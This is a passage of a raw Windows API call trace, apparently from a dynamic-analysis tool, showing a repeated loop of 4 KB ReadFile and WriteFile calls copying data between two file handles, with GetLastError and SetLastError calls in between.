lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.353] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.353] GetLastError () returned 0x0 [0091.353] SetLastError (dwErrCode=0x0) [0091.353] GetLastError () returned 0x0 [0091.353] SetLastError (dwErrCode=0x0) [0091.353] GetLastError () returned 0x0 [0091.354] SetLastError (dwErrCode=0x0) [0091.354] GetLastError () returned 0x0 [0091.354] SetLastError (dwErrCode=0x0) [0091.354] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.354] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.354] GetLastError () returned 0x0 [0091.354] SetLastError (dwErrCode=0x0) [0091.354] GetLastError () returned 0x0 [0091.354] SetLastError (dwErrCode=0x0) [0091.354] GetLastError () returned 0x0 [0091.354] SetLastError (dwErrCode=0x0) [0091.354] GetLastError () returned 0x0 [0091.354] SetLastError (dwErrCode=0x0) [0091.354] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.354] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.354] GetLastError () returned 0x0 [0091.354] SetLastError (dwErrCode=0x0) [0091.354] GetLastError () returned 0x0 [0091.354] SetLastError (dwErrCode=0x0) [0091.354] GetLastError () returned 0x0 [0091.355] SetLastError (dwErrCode=0x0) [0091.355] GetLastError () returned 0x0 [0091.355] SetLastError (dwErrCode=0x0) [0091.355] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.355] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.355] GetLastError () returned 0x0 [0091.355] SetLastError (dwErrCode=0x0) [0091.355] GetLastError () returned 0x0 [0091.355] SetLastError (dwErrCode=0x0) [0091.355] GetLastError () returned 0x0 [0091.355] SetLastError (dwErrCode=0x0) [0091.355] GetLastError () returned 0x0 [0091.355] SetLastError (dwErrCode=0x0) [0091.355] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.355] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.355] GetLastError () returned 0x0 [0091.355] SetLastError (dwErrCode=0x0) [0091.355] GetLastError () returned 0x0 [0091.355] SetLastError (dwErrCode=0x0) [0091.356] GetLastError () returned 0x0 [0091.356] SetLastError (dwErrCode=0x0) [0091.356] GetLastError () returned 0x0 [0091.356] SetLastError (dwErrCode=0x0) [0091.356] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.356] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.356] GetLastError () returned 0x0 [0091.356] SetLastError (dwErrCode=0x0) [0091.356] GetLastError () returned 0x0 [0091.356] SetLastError (dwErrCode=0x0) [0091.356] GetLastError () returned 0x0 [0091.356] SetLastError (dwErrCode=0x0) [0091.356] GetLastError () returned 0x0 [0091.356] SetLastError (dwErrCode=0x0) [0091.356] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.356] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.356] GetLastError () returned 0x0 [0091.356] SetLastError (dwErrCode=0x0) [0091.356] GetLastError () returned 0x0 [0091.357] SetLastError (dwErrCode=0x0) [0091.357] GetLastError () returned 0x0 [0091.357] SetLastError (dwErrCode=0x0) [0091.357] GetLastError () returned 0x0 [0091.357] SetLastError (dwErrCode=0x0) [0091.357] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.357] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.357] GetLastError () returned 0x0 [0091.357] SetLastError (dwErrCode=0x0) [0091.357] GetLastError () returned 0x0 [0091.357] SetLastError (dwErrCode=0x0) [0091.357] GetLastError () returned 0x0 [0091.357] SetLastError (dwErrCode=0x0) [0091.357] GetLastError () returned 0x0 [0091.357] SetLastError (dwErrCode=0x0) [0091.357] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.357] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.358] GetLastError () returned 0x0 [0091.358] SetLastError (dwErrCode=0x0) [0091.358] GetLastError () returned 0x0 [0091.358] SetLastError (dwErrCode=0x0) [0091.358] GetLastError () returned 0x0 [0091.358] SetLastError (dwErrCode=0x0) [0091.358] GetLastError () returned 0x0 [0091.358] SetLastError (dwErrCode=0x0) [0091.358] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.358] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.359] GetLastError () returned 0x0 [0091.359] SetLastError (dwErrCode=0x0) [0091.359] GetLastError () returned 0x0 [0091.359] SetLastError (dwErrCode=0x0) [0091.359] GetLastError () returned 0x0 [0091.359] SetLastError (dwErrCode=0x0) [0091.359] GetLastError () returned 0x0 [0091.359] SetLastError (dwErrCode=0x0) [0091.359] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.359] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.359] GetLastError () returned 0x0 [0091.359] SetLastError (dwErrCode=0x0) [0091.359] GetLastError () returned 0x0 [0091.359] SetLastError (dwErrCode=0x0) [0091.359] GetLastError () returned 0x0 [0091.359] SetLastError (dwErrCode=0x0) [0091.359] GetLastError () returned 0x0 [0091.359] SetLastError (dwErrCode=0x0) [0091.360] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.360] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.360] GetLastError () returned 0x0 [0091.360] SetLastError (dwErrCode=0x0) [0091.360] GetLastError () returned 0x0 [0091.360] SetLastError (dwErrCode=0x0) [0091.360] GetLastError () returned 0x0 [0091.360] SetLastError (dwErrCode=0x0) [0091.360] GetLastError () returned 0x0 [0091.360] SetLastError (dwErrCode=0x0) [0091.360] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.360] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.360] GetLastError () returned 0x0 [0091.360] SetLastError (dwErrCode=0x0) [0091.360] GetLastError () returned 0x0 [0091.360] SetLastError (dwErrCode=0x0) [0091.360] GetLastError () returned 0x0 [0091.360] SetLastError (dwErrCode=0x0) [0091.361] GetLastError () returned 0x0 [0091.361] SetLastError (dwErrCode=0x0) [0091.361] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.361] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.361] GetLastError () returned 0x0 [0091.361] SetLastError (dwErrCode=0x0) [0091.361] GetLastError () returned 0x0 [0091.361] SetLastError (dwErrCode=0x0) [0091.361] GetLastError () returned 0x0 [0091.361] SetLastError (dwErrCode=0x0) [0091.361] GetLastError () returned 0x0 [0091.361] SetLastError (dwErrCode=0x0) [0091.361] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.361] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.361] GetLastError () returned 0x0 [0091.361] SetLastError (dwErrCode=0x0) [0091.361] GetLastError () returned 0x0 [0091.361] SetLastError (dwErrCode=0x0) [0091.362] GetLastError () returned 0x0 [0091.362] SetLastError (dwErrCode=0x0) [0091.362] GetLastError () returned 0x0 [0091.362] SetLastError (dwErrCode=0x0) [0091.362] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.362] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.362] GetLastError () returned 0x0 [0091.362] SetLastError (dwErrCode=0x0) [0091.362] GetLastError () returned 0x0 [0091.362] SetLastError (dwErrCode=0x0) [0091.362] GetLastError () returned 0x0 [0091.362] SetLastError (dwErrCode=0x0) [0091.362] GetLastError () returned 0x0 [0091.362] SetLastError (dwErrCode=0x0) [0091.362] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.362] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.363] GetLastError () returned 0x0 [0091.363] SetLastError (dwErrCode=0x0) [0091.363] GetLastError () returned 0x0 [0091.363] SetLastError (dwErrCode=0x0) [0091.363] GetLastError () returned 0x0 [0091.363] SetLastError (dwErrCode=0x0) [0091.363] GetLastError () returned 0x0 [0091.363] SetLastError (dwErrCode=0x0) [0091.363] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.363] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.363] GetLastError () returned 0x0 [0091.363] SetLastError (dwErrCode=0x0) [0091.363] GetLastError () returned 0x0 [0091.363] SetLastError (dwErrCode=0x0) [0091.363] GetLastError () returned 0x0 [0091.363] SetLastError (dwErrCode=0x0) [0091.363] GetLastError () returned 0x0 [0091.363] SetLastError (dwErrCode=0x0) [0091.363] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.363] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.364] GetLastError () returned 0x0 [0091.364] SetLastError (dwErrCode=0x0) [0091.364] GetLastError () returned 0x0 [0091.364] SetLastError (dwErrCode=0x0) [0091.364] GetLastError () returned 0x0 [0091.364] SetLastError (dwErrCode=0x0) [0091.364] GetLastError () returned 0x0 [0091.364] SetLastError (dwErrCode=0x0) [0091.364] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.364] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.364] GetLastError () returned 0x0 [0091.364] SetLastError (dwErrCode=0x0) [0091.364] GetLastError () returned 0x0 [0091.364] SetLastError (dwErrCode=0x0) [0091.364] GetLastError () returned 0x0 [0091.364] SetLastError (dwErrCode=0x0) [0091.364] GetLastError () returned 0x0 [0091.364] SetLastError (dwErrCode=0x0) [0091.364] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.364] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.365] GetLastError () returned 0x0 [0091.365] SetLastError (dwErrCode=0x0) [0091.365] SetLastError (dwErrCode=0x0) [0091.365] SetLastError (dwErrCode=0x0) [0091.365] SetLastError (dwErrCode=0x0) [0091.365] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.365] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.365] SetLastError (dwErrCode=0x0) [0091.365] SetLastError (dwErrCode=0x0) [0091.365] SetLastError (dwErrCode=0x0) [0091.365] SetLastError (dwErrCode=0x0) [0091.365] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.365] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.366] SetLastError (dwErrCode=0x0) [0091.366] SetLastError (dwErrCode=0x0) [0091.366] SetLastError (dwErrCode=0x0) [0091.366] SetLastError (dwErrCode=0x0) [0091.366] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.366] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.366] SetLastError (dwErrCode=0x0) [0091.366] SetLastError (dwErrCode=0x0) [0091.366] SetLastError (dwErrCode=0x0) [0091.366] SetLastError (dwErrCode=0x0) [0091.366] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.366] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.367] SetLastError (dwErrCode=0x0) [0091.367] SetLastError (dwErrCode=0x0) [0091.367] SetLastError (dwErrCode=0x0) [0091.367] SetLastError (dwErrCode=0x0) [0091.367] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.367] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.367] SetLastError (dwErrCode=0x0) [0091.367] SetLastError (dwErrCode=0x0) [0091.367] SetLastError (dwErrCode=0x0) [0091.367] SetLastError (dwErrCode=0x0) [0091.367] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.367] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.367] SetLastError (dwErrCode=0x0) [0091.367] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.368] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.368] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.368] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.368] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.368] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.368] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.368] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.369] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.369] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.369] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.369] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.369] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.369] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.369] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.369] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.370] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.370] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.370] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.370] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.370] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.370] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, 